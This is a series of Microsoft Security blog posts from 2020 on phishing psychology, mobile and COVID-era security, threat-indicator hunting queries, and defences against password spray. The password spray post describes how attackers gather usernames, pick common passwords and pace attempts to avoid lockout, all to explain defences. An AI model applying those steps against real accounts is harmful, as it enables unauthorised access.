How consistency is used in phishing: Scammers take advantage of people’s desire to be consistent by asking for something small in an initial email and then asking for more later.

Leveraging consistency to reduce phishing: One way to employ the Principle of Consistency in your security program is to ask staff to commit to security. Even more powerful? Have them do it in writing.

Liking

It probably won’t surprise you to learn that people are more likely to say yes to someone they like. If a friend asks for help, I want to say yes, but it’s easier to say no to stranger. But even a stranger can be persuasive if they are perceived as nice. In the raffle experiment, people were more likely to buy raffle tickets if the person selling the tickets brought them a soda, and less likely if the person only bought themselves a soda.[8]

How liking is used in phishing: When bad actors spoof or hack an individual’s email account and then send a phishing email to that person’s contacts, they are using the Principle of Liking. They are hoping that one of the hacking victim’s friends won’t spend much time scrutinizing the email content and will just act because the like the “sender.”

Leveraging liking to reduce phishing: To be more persuasive with your staff, cultivate an “internal consulting” mindset. Be friendly and build relationships, so that people want to say yes when you ask them to change their behavior.

Consensus

When people are uncertain, they look to others to help them formulate an opinion. Even when they are confident of their beliefs, consensus opinions can be very persuasive. This can be seen in the light dot experiment. In this study, individuals were asked how much a (stationary) dot of light was moving. It appeared to move due to autokinetic effect. Days later, the subjects were divided into groups. Despite very different earlier estimates, responses “normalized” to the broader group. If brought back to provide an individual estimate, individuals continued to provide the group estimate.[9]

How consensus is used in phishing: Adversaries exploit cultural trends. For example, when there is a natural disaster, there are often several illegitimate organizations posing as a charity to elicit donations.

Leveraging consensus to reduce phishing: Highlight positive security behaviors among other employees or report favorable statistics that indicate most people are complying with a security policy.

The more complex life becomes, the more likely humans will rely on cognitive shortcuts to make decisions. Educate your employees on how the Cialdini’s Six Principles of Persuasion can be used to trick them. Try implementing the principles in your own communication and training programs to improve compliance. Over time, you can build a culture that is less likely to fall for social engineering campaigns.

Watch “The psychology of social engineering: the soft side of cybercrime” presentation at InfoSec World v2020.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter.

[1] Trick with treat – Reciprocity increases the willingness to communicate personal data, Happ, Melzer, Steffgen, https://dl.acm.org/citation.cfm?id=2950731
[2] 2016 Enterprise Phishing Susceptibility and Resiliency Report, https://phishme.com/enterprise-phishing-susceptibility-report
[3] Microsoft Global Survey on Tech Support Scams, https://mscorpmedia.azureedge.net/mscorpmedia/2016/10/Microsoft_Infographic_final.pdf
[4] Kunz, Phillip R; Woolcott, Michael (1976-09-01). “Season’s greetings: From my status to yours.” Social Science Research. 5 (3): 269–278
[5] Worchel, Stephen; Lee, Jerry; Adewole, Akanbi (1975). “Effects of supply and demand on ratings of object value.” Journal of Personality and Social Psychology. 32 (5): 906–914.
[6] Milgram, Stanley (1963). “Behavioral Study of Obedience.” Journal of Abnormal and Social Psychology. 67(4): 371–8.
[7] Commitment and Behavior Change: Evidence from the Field Katie Baca-Motes, Amber Brown, Ayelet Gneezy, Elizabeth A. Keenan, Leif D. Nelson Journal of Consumer Research, Volume 39, Issue 5, 1 February 2013, Pages 1070–1084
[8] Regan, Dennis T. (1971-11-01). “Effects of a favor and liking on compliance.” Journal of Experimental Social Psychology. 7 (6): 627–639.
[9] Sherif, M (1935). “A study of some social factors in perception.” Archives of Psychology. 27: 187.

The post The psychology of social engineering—the “soft” side of cybercrime appeared first on Microsoft Security.

Microsoft continues to extend security for all with mobile protection for Android

June 23rd, 2020 No comments

Just a year ago, we shared our first steps on a journey to enable our customers to protect endpoints running a variety of platforms with our announcement of Microsoft Defender ATP for Mac. Knowing that each of our customers have unique environments and unique needs and are looking for more unification in their security solutions, we communicated our commitment to build security solutions from Microsoft, not just for Microsoft. Since then, we’ve announced capabilities for Linux servers, and at RSA, and we offered you a sneak peek into our mobile threat defense investments.

Today, I’m proud to announce the public preview of Microsoft Defender ATP for Android.

Protecting mobile devices from evolving threats, phishing attacks, unwanted apps

As more business is getting done on mobile devices, the lines blur between work and personal life. The threats here are unique. For example, one of the biggest and fastest growing threats on mobile is phishing attacks, majority of which happen outside of email, such as via phishing sites, messaging apps, games, and other applications, and are tricky to spot on smaller form factors. Other common mobile threats include malicious applications that users are lured into downloading, as well as increased risk introduced by rooted devices that may allow unnecessary escalated privileges and the installation of unauthorized applications.

In this rapidly evolving world of mobile threats, Microsoft is taking a holistic approach to tackling these challenges and to securing enterprises and their data with our new mobile threat defense capabilities. We’re leveraging our unique visibility into the threat landscape and the vast signal, intelligence, and security expertise we have from across domains, such as our expertise in phishing and email, our endpoint threat research on malware and attacker techniques, and our focus on identity and zero trust to bring protection capabilities to mobile. Our integrated approach to security enables us to provide more complete coverage. Leveraging these capabilities, Microsoft Defender ATP for Android will help to protect our customers and their users by delivering:

  • Protection from phishing and access to risky domains and URLs through web protection capabilities that will block unsafe sites accessed through SMS/text, WhatsApp, email, browsers, and other apps. We’re using the same Microsoft Defender SmartScreen services that are on Windows to quickly detect malicious sites which means that a decision to block a suspicious site will apply across all devices in the enterprise.
  • Proactive scanning of malicious applications, files, and potentially unwanted applications (PUA) that users may download to their mobile devices. Our capabilities and investments in cloud-powered protection and intelligence on application reputation allow us to quickly detect sophisticated malware and apps that that may display undesirable behavior.
  • Adding layers of protection to help prevent and limit the impact of breaches in an organization. By leveraging tight integration with Microsoft Endpoint Manager and Conditional Access, mobile devices that have been compromised with malicious apps or malware are considered high risk and are blocked from accessing corporate resources.
  • A unified security experience through Microsoft Defender Security Center where defenders can see alerts and easily get the additional context they need to quickly assess and respond to threats across Windows, Mac, Linux, and now mobile devices.

There’s more to share on how these capabilities work and how to get started on the blog in the Microsoft Defender ATP tech community.

In the coming months we will be releasing additional capabilities on Android and you will hear more from us about our investments in mobile threat defense for iOS devices as well.

I’m also thrilled to share that our initial release of Microsoft Defender ATP for Linux is now generally available. Customers have asked us to broaden our selection of platforms natively supported by Microsoft Defender ATP, and today we’re excited to officially start our journey with Linux. This release marks an important moment for all Microsoft Defender ATP customers when Microsoft Defender ATP becomes a truly unified solution to secure the full spectrum of desktop and server platforms that are common across enterprise environments: Windows, macOS, and Linux.

We are committed to helping organizations secure their unique and heterogenous environments and we have so much more in store for you this year. We’re excited for you to join us in our journey as we continue to deliver the industry’s best in integrated threat protection solutions.

For more information on Microsoft Security Solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 

-Rob

The post Microsoft continues to extend security for all with mobile protection for Android appeared first on Microsoft Security.

11 security tips to help stay safe in the COVID-19 era

June 9th, 2020 No comments

The COVID-19 pandemic has changed our daily routines, the ways we work, and our reliance on technology. Many of us are now working remotely, students are attending classes virtually, and we’re relying more on social media and social networks to stay connected as we define what our new normal looks like.

As we spend more time online, it’s important to remember that the basics of online safety have not changed. These guidelines provide a strong foundation for digital security, but as we think about the “new normal” and how the internet is woven into the fabric of our lives, extra steps may be necessary to further reduce risk.

So, in addition to the security policies implemented by your work or school, here are a few more practices we recommend you—and your family and friends—adopt to further increase personal cybersecurity resilience.

Keep devices secure and up to date

  1. Turn on automatic security updates, antivirus, and firewall. The reality of cyberthreats is that they often prey upon the devices that are the easiest to compromise: those without a firewall, without an antivirus service, or without the latest security updates. To reduce this risk, turn on automatic updates to ensure your devices have the latest security fixes, enable or install an antivirus solution that runs continuously, and configure a firewall. Modern computers have many of these features available and enabled by default, but it is a good idea to check all three are correctly set up.
  2. Don’t forget networking devices. Device safety includes your networking devices, too. As with computing devices, make sure that you check for and apply all updates for your networking devices. Many devices use default passwords, which means attackers have an easy list to try. Make sure to check your networking devices are not using default admin passwords or ones that are easily guessable (like your birthday). It’s also good hygiene to update your Wi-Fi credentials to strong passwords with a mix of upper- and lowercase letters as well as symbols and numbers.
  3. Use Wi-Fi encryption options for access. Wireless access points offer the ability to require passwords to gain access to the network. You should take advantage of this feature to ensure only authorized users are on your home network.

Secure your identity, guard your privacy

  1. Protect your digital identity. With more of our lives connected in the virtual realm, your digital identity becomes even more important to protect. Use strong passwords or, if possible, biometric authentication like your face or fingerprint, and wherever possible enable multi-factor authentication (MFA). Among others, Google and Microsoft both offer free MFA applications that are easy to set up and use.
  2. Keep your guard up in online chats and conferencing services. As we spend more time on virtual conferences and video calls, it is important to think about privacy. Consider these questions when trying new services:
    • Who can access or join the meeting/call?
    • Can it be recorded? If yes, do all participants know?
    • Are chats preserved and shared?
    • If there is file sharing, where are those files stored?
  3. Use background blur or images to obscure your location. One of the more popular features on video conferencing tools like Zoom, Skype, and Microsoft Teams is the ability to blur or change your background. This can be an important privacy step that you can take to maintain privacy between home and work environments.

Protect business data while at home

  1. Use the right file-sharing service for the right task. While working remotely, it’s easy for lines to blur between work and home. It’s important to ensure that your business data does not get mixed with your personal data. Remember to use business resources, like SharePoint or OneDrive for Business, to store and share content for work. Don’t use consumer offerings for business data while you are remote. Where possible, consider enabling Windows Information Protection to reduce the risk of unintentional (and intentional) enterprise data leakage via consumer services.
  2. Turn on device encryption. Device encryption ensures that data on your device is safe from unauthorized access should your device be stolen or lost.

Be aware of phishing and identity scams

Cybercriminals continue to exploit victims even through this global crisis. Based on what Microsoft has observed over the last two months, cybercriminals are utilizing new lures related to the coronavirus outbreak and are being indiscriminate in their targeting. As we move into this “new normal” of more virtual engagement, the same vigilance you kept at the office or classroom applies at home. Here are a couple of observed attack methods to keep top of mind:

  1. Identity compromise is still number one point of entry. Attackers are looking to steal your digital identity for monetization, spam, and access. Be on the lookout for unexpected websites and applications asking you to sign in with your credentials. The same goes for MFA requests. If you did not initiate the request, do not verify it. Report suspected sites and uninitiated authentication requests through your browser or applications.
  2. Phishing is still out there. Be wary of offers that are too good to be true, pressure time, or promise a free prize. These are the same bad guys from before, but now they’re using the outbreak and public fear to drive a different action. For more information on phishing attacks, read Protecting against coronavirus themed phishing attacks.
  3. Don’t fall victim to tech support scams. Tech support scams are an industry-wide issue where scammers use scare tactics to try and trick you into paying for unnecessary services that supposedly fix a device, operating system, or software problem. Please note that Microsoft will never contact you with an unsolicited offer to address a technical issue. And error and warning messages in Microsoft products never include a phone number to call. If you receive an unsolicited tech support call telling you there is something wrong with your computer—even if the caller offers to correct the issue for free—hang up and report the call to https://www.microsoft.com/reportascam. For more information on tech support scams, visit this page: https://support.microsoft.com/en-us/help/4013405/windows-protect-from-tech-support-scams.

With awareness and these few simple steps, you can better prepare yourself for this new world of secure remote work and social interaction. And as attackers evolve, we’ll be here to help you adapt and stay safe.

To learn more about Microsoft security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 11 security tips to help stay safe in the COVID-19 era appeared first on Microsoft Security.

Open-sourcing new COVID-19 threat intelligence

May 14th, 2020 No comments

A global threat requires a global response. While the world faces the common threat of COVID-19, defenders are working overtime to protect users all over the globe from cybercriminals using COVID-19 as a lure to mount attacks. As a security intelligence community, we are stronger when we share information that offers a more complete view of attackers’ shifting techniques. This more complete view enables us all to be more proactive in protecting, detecting, and defending against attacks.

At Microsoft, our security products provide built-in protections against these and other threats, and we’ve published detailed guidance to help organizations combat current threats (Responding to COVID-19 together). Our threat experts are sharing examples of malicious lures and we have enabled guided hunting of COVID-themed threats using Azure Sentinel Notebooks. Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack. Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions. Microsoft Threat Protection (MTP) customers are already protected against the threats identified by these indicators across endpoints with Microsoft Defender Advanced Threat Protection (ATP) and email with Office 365 ATP.

In addition, we are publishing these indicators for those not protected by Microsoft Threat Protection to raise awareness of attackers’ shift in techniques, how to spot them, and how to enable your own custom hunting. These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.

This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.

This COVID-specific threat intelligence feed represents a start at sharing some of Microsoft’s COVID-related IOCs. We will continue to explore ways to improve the data over the duration of the crisis. While some threats and actors are still best defended more discreetly, we are committed to greater transparency and taking community feedback on what types of information is most useful to defenders in protecting against COVID-related threats. This is a time-limited feed. We are maintaining this feed through the peak of the outbreak to help organizations focus on recovery.

Protection in Azure Sentinel and Microsoft Threat Protection

Today’s release includes file hash indicators related to email-based attachments identified as malicious and attempting to trick users with COVID-19 or Coronavirus-themed lures. The guidance below provides instructions on how to access and integrate this feed in your own environment.

For Azure Sentinel customers, these indicators can be either be imported directly into Azure Sentinel using a Playbook or accessed directly from queries.

The Azure Sentinel Playbook that Microsoft has authored will continuously monitor and import these indicators directly into your Azure Sentinel ThreatIntelligenceIndicator table. This Playbook will match with your event data and generate security incidents when the built-in threat intelligence analytic templates detect activity associated to these indicators.

These indicators can also be accessed directly from Azure Sentinel queries as follows:

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"));
covidIndicators

Azure Sentinel logs.

A sample detection query is also provided in the Azure Sentinel GitHub. With the table definition above, it is as simple as:

  1. Join the indicators against the logs ingested into Azure Sentinel as follows:
covidIndicators
| join ( CommonSecurityLog | where TimeGenerated >= ago(7d)
| where isnotempty(FileHashValue)
) on $left.FileHashValue == $right.FileHash
  1. Then, select “New alert rule” to configure Azure Sentinel to raise incidents based on this query returning results.

CyberSecurityDemo in Azure Sentinel logs.

You should begin to see Alerts in Azure Sentinel for any detections related to these COVID threat indicators.

Microsoft Threat Protection provides protection for the threats associated with these indicators. Attacks with these Covid-19-themed indicators are blocked by Office 365 ATP and Microsoft Defender ATP.

While MTP customers are already protected, they can also make use of these indicators for additional hunting scenarios using the MTP Advanced Hunting capabilities.

Here is a hunting query to see if any process created a file matching a hash on the list.

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"))
| where FileHashType == 'sha256' and TimeGenerated > ago(1d);
covidIndicators
| join (DeviceFileEvents
| where Timestamp > ago(1d)
| where ActionType == 'FileCreated'
| take 100) on $left.FileHashValue  == $right.SHA256

Advanced hunting in Microsoft Defender Security Center.

This is an Advanced Hunting query in MTP that searches for any recipient of an attachment on the indicator list and sees if any recent anomalous log-ons happened on their machine. While COVID threats are blocked by MTP, users targeted by these threats may be at risk for non-COVID related attacks and MTP is able to join data across device and email to investigate them.

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )    [@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"] with (format="csv"))
| where FileHashType == 'sha256' and TimeGenerated > ago(1d);
covidIndicators
| join (  EmailAttachmentInfo  | where Timestamp > ago(1d)
| project NetworkMessageId , SHA256
) on $left.FileHashValue  == $right.SHA256
| join (
EmailEvents
| where Timestamp > ago (1d)
) on NetworkMessageId
| project TimeEmail = Timestamp, Subject, SenderFromAddress, AccountName = tostring(split(RecipientEmailAddress, "@")[0])
| join (
DeviceLogonEvents
| project LogonTime = Timestamp, AccountName, DeviceName
) on AccountName
| where (LogonTime - TimeEmail) between (0min.. 90min)
| take 10

Advanced hunting in Microsoft 365 security.

Connecting an MISP instance to Azure Sentinel

The indicators published on the Azure Sentinel GitHub page can be consumed directly via MISP’s feed functionality. We have published details on doing this at this URL: https://aka.ms/msft-covid19-misp. Please refer to the Azure Sentinel documentation on connecting data from threat intelligence providers.

Using the indicators if you are not an Azure Sentinel or MTP customer

Yes, the Azure Sentinel GitHub is public: https://aka.ms/msft-covid19-Indicators

Examples of phishing campaigns in this threat intelligence

The following is a small sample set of the types of COVID-themed phishing lures using email attachments that will be represented in this feed. Beneath each screenshot are the relevant hashes and metadata.

Figure 1: Spoofing WHO branding with “cure” and “vaccine” messaging with a malicious .gz file.

Name: CURE FOR CORONAVIRUS_pdf.gz

World Health Organization phishing email.

Figure 2: Spoofing Red Cross Safety Tips with malicious .docm file.

Name: COVID-19 SAFETY TIPS.docm

Red Cross phishing email.

Figure 3: South African banking lure promoting COVID-19 financial relief with malicious .html files.

Name: SBSA-COVID-19-Financial Relief.html

Financial relief phishing email.

Figure 4: French language spoofed correspondence from the WHO with malicious XLS Macro file.

Name:✉-Covid-19 Relief Plan5558-23636sd.htm

Coronavirus-themed phishing email.

If you have questions or feedback on this COVID-19 feed, please email msft-covid19-ti@microsoft.com.

The post Open-sourcing new COVID-19 threat intelligence appeared first on Microsoft Security.

Protecting your organization against password spray attacks

April 23rd, 2020 No comments

When hackers plan an attack, they often engage in a numbers game. They can invest significant time pursing a single, high-value target—someone in the C-suite for example and do “spear phishing.” Or if they just need low-level access to gain a foothold in an organization or do reconnaissance, they target a huge volume of people and spend less time on each one which is called “password spray.” Last December Seema Kathuria and I described an example of the first approach in Spear phishing campaigns—they’re sharper than you think! Today, I want to talk about a high-volume tactic: password spray.

In a password spray attack, adversaries “spray” passwords at a large volume of usernames. When I talk to security professionals in the field, I often compare password spray to a brute force attack. Brute force is targeted. The hacker goes after specific users and cycles through as many passwords as possible using either a full dictionary or one that’s edited to common passwords. An even more targeted password guessing attack is when the hacker selects a person and conducts research to see if they can guess the user’s password—discovering family names through social media posts, for example. And then trying those variants against an account to gain access. Password spray is the opposite. Adversaries acquire a list of accounts and attempt to sign into all of them using a small subset of the most popular, or most likely, passwords. Until they get a hit. This blog describes the steps adversaries use to conduct these attacks and how you can reduce the risk to your organization.

Three steps to a successful password spray attack

Step 1: Acquire a list of usernames

It starts with a list of accounts. This is easier than it sounds. Most organizations have a formal convention for emails, such as firstname.lastname@company.com. This allows adversaries to construct usernames from a list of employees. If the bad actor has already compromised an account, they may try to enumerate usernames against the domain controller. Or, they find or buy usernames online. Data can be compiled from past security breaches, online profiles, etc. The adversary might even get some verified profiles for free!

Step 2: Spray passwords

Finding a list of common passwords is even easier. A Bing search reveals that publications list the most common passwords each year. 123456, password, and qwerty are typically near the top. Wikipedia lists the top 10,000 passwords. There are regional differences that may be harder to discovery, but many people use a favorite sports teams, their state, or company as a password. For example, Seahawks is a popular password choice in the Seattle area. Once hackers do their research, they carefully select a password and try it against the entire list of accounts as shown in Figure 1. If the attack is not successful, they wait 30 minutes to avoid triggering a timeout, and then try the next password.

Protecting your organization against password spray attacks

Figure 1:  Password spray using one password across multiple accounts.

Step 3: Gain access

Eventually one of the passwords works against one of the accounts. And that’s what makes password spray a popular tactic—attackers only need one successful password + username combination. Once they have it, they can access whatever the user has access to, such as cloud resources on OneDrive. Or use the exploited account to do internal reconnaissance on the target network and get deeper into the systems via elevation of privilege.

Even if the vast majority of your employees don’t use popular passwords, there is a risk that hackers will find the ones that do. The trick is to reduce the number of guessable passwords used at your organization.

Configure Azure Active Directory (Azure AD) Password Protection

Azure AD Password Protection allows you to eliminate easily guessed passwords and customize lockout settings for your environment. This capability includes a globally banned password list that Microsoft maintains and updates. You can also block a custom list of passwords that are relevant to your region or company. Once enabled, users won’t be able to choose a password on either of these lists, making it significantly less likely that an adversary can guess a user’s password. You can also use this feature to define how many sign-in attempts will trigger a lockout and how long the lockout will last.

Simulate attacks with Office 365 Advanced Threat Protection (Office 365 ATP)

Attack Simulator in Office 365 ATP lets you run realistic, but simulated phishing and password attack campaigns in your organization. Pick a password and then run the campaign against as many users as you want. The results will let you know how many people are using that password. Use the data to train users and build your custom list of banned passwords.

Begin your passwordless journey

The best way to reduce your risk of password spray is to eliminate passwords entirely. Solutions like Windows Hello or FIDO2 security keys let users sign in using biometrics and/or a physical key or device. Get started by enabling Multi-Factor Authentication (MFA) across all your accounts. MFA requires that users sign in with at least two authentication factors: something they know (like a password or PIN), something they are (such as biometrics), and/or something they have (such as a trusted device).

Learn more

We make progress in cybersecurity by increasing how much it costs the adversary to conduct the attack. If we make guessing passwords too hard, hackers will reduce their reliance on password spray.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. For more information about our security solutions visit our website. Or reach out to me on LinkedIn or Twitter.

The post Protecting your organization against password spray attacks appeared first on Microsoft Security.

Microsoft shares new threat intelligence, security guidance during global crisis

April 8th, 2020 No comments

Ready or not, much of the world was thrust into working from home, which means more people and devices are now accessing sensitive corporate data across home networks. Defenders are working round the clock to secure endpoints and ensure the fidelity of not only those endpoints, but also identities, email, and applications, as people are using whatever device they need to get work done. This isn’t something anyone, including our security professionals, were given time to prepare for, yet many customers have been thrust into a new environment and challenged to respond quickly. Microsoft is here to help lighten the load on defenders, offer guidance on what to prioritize to keep your workforce secure, and share resources about the built-in protections of our products.

Attackers are capitalizing on fear. We’re watching them. We’re pushing back.

Our inboxes, mobile alerts, TVs, and news updates are all COVID-19, all the time. It’s overwhelming and attackers know it. They know many are clicking without looking because stress levels are high and they’re taking advantage of that. That’s why we’re seeing an increase in the success of phishing and social engineering attacks. Attackers don’t suddenly have more resources they’re diverting towards tricking users; instead they’re pivoting their existing infrastructure, like ransomware, phishing, and other malware delivery tools, to include COVID-19 keywords that get us to click. Once we click, they can infiltrate our inboxes, steal our credentials, share more malicious links with coworkers across collaboration tools, and lie in wait to steal information that will give them the biggest payout. This is where intelligent solutions that can monitor for malicious activity across – that’s the key word – emails, identities, endpoints, and applications with built-in automation to proactively protect, detect, respond to, and prevent these types of attacks from being successful will help us fight this battle against opportunistic attackers.

Our threat intelligence teams at Microsoft are actively monitoring and responding to this shift in focus. Our data shows that these COVID-19 themed threats are retreads of existing attacks that have been slightly altered to tie to this pandemic. This means we’re seeing a changing of lures, not a surge in attacks. Our intelligence shows that these attacks are settling into a rhythm that is the normal ebb and flow of the threat environment:

  • Every country in the world has seen at least one COVID-19 themed attack (see map below). The volume of successful attacks in outbreak-hit countries is increasing, as fear and the desire for information grows. Our telemetry shows that China, the United States, and Russia have been hit the hardest.
  • The trendy and pervasive Trickbot and Emotet malware families are very active and rebranding their lures to take advantage of the outbreak. We have observed 76 threat variants to date globally using COVID-19 themed lures (map below).
  • Microsoft tracks thousands of email phishing campaigns that cover millions of malicious messages every week. Phishing campaigns are more than just one targeted email at one targeted user. They include potentially hundreds or thousands of malicious emails targeting hundreds or thousands of users, which is why they can be so effective. Of the millions of targeted messages we see each day, roughly 60,000 include COVID-19 related malicious attachments or malicious URLs.
  • While that number sounds very large, it’s important to note that that is less than two percent of the total volume of threats we actively track and protect against daily, which reinforces that the overall volume of threats is not increasing but attackers are shifting their techniques to capitalize on fear. Attackers are impersonating established entities like the World Health Organization (WHO), Centers for Disease Control and Prevention (CDC), and the Department of Health to get into inboxes. Here’s an example of what just one of these malicious emails looks like now compared to before the COVID-19 crisis:

Comparison of malicious emails used in malware campaigns before the crisis and during

  • In a single day, SmartScreen sees and processes more than 18,000 malicious COVID-19-themed URLs and IP addresses. This again shows us that attackers are getting more aggressive and agile in the delivery of their attacks – using the same delivery methods, but swapping out the malicious URLs on a more frequent basis in an effort to evade machine learning protections.
  • Microsoft Office 365 Advanced Threat Protection prevented a big phishing campaign that used a fake Office 365 sign-in page to capture credentials. Roughly 2,300 unique HTML attachments posing as COVID-19 financial compensation information were caught in 24 hours in this one campaign. We expect to see more campaigns that utilize the economic fear from lost income, as governments widen the mandatory shutdown of their economies and stimulus funds begin to be issued in the U.S.
  • Several advanced persistent threat and nation-state actors have been observed targeting healthcare organizations and using COVID-19-themed lures in their campaigns. We continue to identify, track, and build proactive protections against these threats in all of our security products. When customers are affected by these attacks, Microsoft notifies the customer directly to help speed up investigations. We also report malicious COVID-19-themed domains and URLs to the proper authorities so that they can be taken down, and where possible, the individuals behind them prosecuted.

Map showing global impact of COVID-19-themed-attacks

Relative impact of COVID-19 themed attacks across the world by file count (as of April 7, 2020)

From endpoints and identities to the cloud, we have you covered

While phishing email is a common attack vector, it’s only one of the many points of entry for attackers. Defenders need a much broader view and solutions for remediation than visibility into just one entry method. An attacker’s primary goal is to gain entry and expand across domains so they can persist in an organization and lie in wait to steal or encrypt as much sensitive information as they can to reap the biggest payout. Defenders require visibility across each of these domains and automated correlation across emails, identities, endpoints, and cloud applications to see the full scope of compromise. Only with this view can defenders adequately remediate affected assets, apply Conditional Access, and prevent the same or similar attacks from being successful again.

During this trying time, we want to remind our customers what protections you have built into our products and offer guidance for what to prioritize:

  • Protect endpoints with Microsoft Defender ATP, which covers licensed users for up to five concurrent devices that can be easily onboarded at any time. Microsoft Defender ATP monitors threats from across platforms, including macOS. Our tech community post includes additional guidance, best practices, onboarding, and licensing information.
  • Enable multi-factor authentication (MFA) and Conditional Access through Azure Active Directory to protect identities. This is more important than ever to mitigate credential compromise as users work from home. We recommend connecting all apps to Azure AD for single sign-on – from SaaS to on-premises apps; enabling MFA and applying Conditional Access policies; and extending secure access to contractors and partners. Microsoft also offers a free Azure AD service for single sign-on, including MFA using the Microsoft Authenticator app.
  • Safeguard inboxes and email accounts with Office 365 ATP, Microsoft’s cloud-based email filtering service, which shields against phishing and malware, including features to safeguard your organization from messaging-policy violations, targeted attacks, zero-days, and malicious URLs. Intelligent recommendations from Security Policy Advisor can help reduce macro attack surface, and the Office Cloud Policy Service can help you implement security baselines.
  • Microsoft Cloud App Security can help protect against shadow IT and unsanctioned app usage, identify and remediate cloud-native attacks, and control how data travels across cloud apps from Microsoft or third-party applications.

Microsoft Threat Protection correlates signals from across each of these domains using Azure ATP, Microsoft Defender ATP, Office 365 ATP, and Microsoft Cloud App Security, to understand the entire attack chain to help defenders prioritize which threats are most critical to address and to auto-heal affected user identities, email inboxes, endpoints, and cloud apps back to a safe state. Our threat intelligence combines signals from not just one attack vector like email phishing, but from across emails, identities, endpoints, and cloud apps to understand how the threat landscape is changing and build that intelligence into our products to prevent attack sprawl and persistence. The built-in, automated remediation capabilities across these solutions can also help reduce the manual workload on defenders that comes from the multitude of new devices and connections.

Azure Sentinel is a cloud-native SIEM that brings together insights from Microsoft Threat Protection and Azure Security Center, along with the whole world of third-party and custom application logs to help security teams gain visibility, triage, and investigate threats across their enterprise. As with all Microsoft Security products, Azure Sentinel customers benefit from Microsoft threat intelligence to detect and hunt for attacks. Azure Sentinel makes it easy to add new data sources and scale existing ones with built-in workbooks, hunting queries, and analytics to help teams identify, prioritize, and respond to threats. We recently shared a threat hunting notebook developed to hunt for COVID-19 related threats in Azure Sentinel.

Cloud-delivered protections are a critical part of staying up to date with the latest security updates and patches. If you don’t already have them turned on, we highly recommend it. We also offer advanced hunting through both Microsoft Threat Protection and Azure Sentinel.

We’ll keep sharing and protecting – stay tuned, stay safe

Remember that we at Microsoft are 3,500 defenders strong. We’re very actively monitoring the threat landscape, we’re here to help: we’re providing resources, guidance, and for dire cases we have support available from services like the Microsoft Detection and Response (DART) team to help investigate and remediate.

All of our guidance related to COVID-19 is and will be posted here. We will continue to share updates across channels to keep you informed. Please stay safe, stay connected, stay informed.

THANK YOU to our defenders who are working tirelessly to keep us secure and connected during this pandemic.

 

 

-Rob and all of us from across Microsoft security

 

 

To stay up to date with verified information on the COVID-19 crisis, the following sites are available:

 

The post Microsoft shares new threat intelligence, security guidance during global crisis appeared first on Microsoft Security.

Full Operational Shutdown—another cybercrime case from the Microsoft Detection and Response Team

April 2nd, 2020 No comments

Recently, we published our first case report (001: …And Then There Were Six) by the Microsoft Detection and Response Team (DART). We received significant positive response from our customers and colleagues and our team has been getting inquiries asking for more reports. We are glad to share the DART Case Report 002: Full Operational Shutdown.

In the report 002, we cover an actual incident response engagement where a polymorphic malware spread through the entire network of an organization. After a phishing email delivered Emotet, a polymorphic virus that propagates via network shares and legacy protocols, the virus shut down the organization’s core services. The virus avoided detection by antivirus solutions through regular updates from an attacker-controlled command-and-control (C2) infrastructure, and spread through the company’s systems, causing network outages and shutting down essential services for nearly a week. In our report, you can read the details of the attack and how DART responded, review the attack lateral progression diagram and learn best practices from DART experts.

Stay tuned for more DART case reports where you’ll find unique stories from our team’s engagements around the globe. As always, you can reach out to your Microsoft account manager or Premier Support contact for more information on DART services.

 

DART provides the most complete and thorough investigations by leveraging a combination of proprietary tools and Microsoft Security products, close connections with internal Microsoft threat intelligence and product groups, as well as strategic partnerships with security organizations around the world.

The post Full Operational Shutdown—another cybercrime case from the Microsoft Detection and Response Team appeared first on Microsoft Security.

Protecting against coronavirus themed phishing attacks

March 20th, 2020 No comments

The world has changed in unprecedented ways in the last several weeks due to the coronavirus pandemic. While it has brought out the best in humanity in many ways, as with any crisis it can also attract the worst in some. Cybercriminals use people’s fear and need for information in phishing attacks to steal sensitive information or spread malware for profit. Even as some criminal groups claim they’ll stop attacking healthcare and nursing homes, the reality is they can’t fully control how malware spreads.

While phishing and other email attacks are indeed happening, the volume of malicious emails mentioning the coronavirus is very small. Still, customers are asking us what Microsoft is doing to help protect them from these types of attacks, and what they can do to better protect themselves. We thought this would be a useful time to recap how our automated detection and signal-sharing works to protect customers (with a specific recent example) as well as share some best practices you can use personally to stay safe from phishing attempts.

What Microsoft is doing

First, 91 percent of all cyberattacks start with email. That’s why the first line of defense is doing everything we can to block malicious emails from reaching you in the first place. A multi-layered defense system that includes machine learning, detonation, and signal-sharing is key in our ability to quickly find and shut down email attacks.

If any of these mechanisms detect a malicious email, URL, or attachment, the message is blocked and does not make its way to your inbox. All attachments and links are detonated (opened in isolated virtual machines). Machine learning, anomaly analyzers, and heuristics are used to detect malicious behavior. Human security analysts continuously evaluate user-submitted reports of suspicious mail to provide additional insights and train machine learning models.

